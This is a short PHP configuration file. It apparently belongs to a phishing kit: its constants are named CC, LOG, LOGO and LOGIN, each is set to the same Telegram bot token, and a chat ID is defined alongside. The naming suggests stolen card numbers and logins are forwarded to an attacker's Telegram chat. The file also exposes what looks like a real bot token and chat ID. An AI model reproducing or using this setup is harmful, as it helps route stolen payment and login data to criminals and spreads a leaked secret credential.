<?php
define('CC', '8434119591:AAFeXkqrs3spKHtFbkw5OZNLVIBvs8Qf7vM');
define('LOG', '8434119591:AAFeXkqrs3spKHtFbkw5OZNLVIBvs8Qf7vM');
define('LOGO', '8434119591:AAFeXkqrs3spKHtFbkw5OZNLVIBvs8Qf7vM');
define('CHATID', '-4803034495');
define('LOGIN', '8434119591:AAFeXkqrs3spKHtFbkw5OZNLVIBvs8Qf7vM');
?>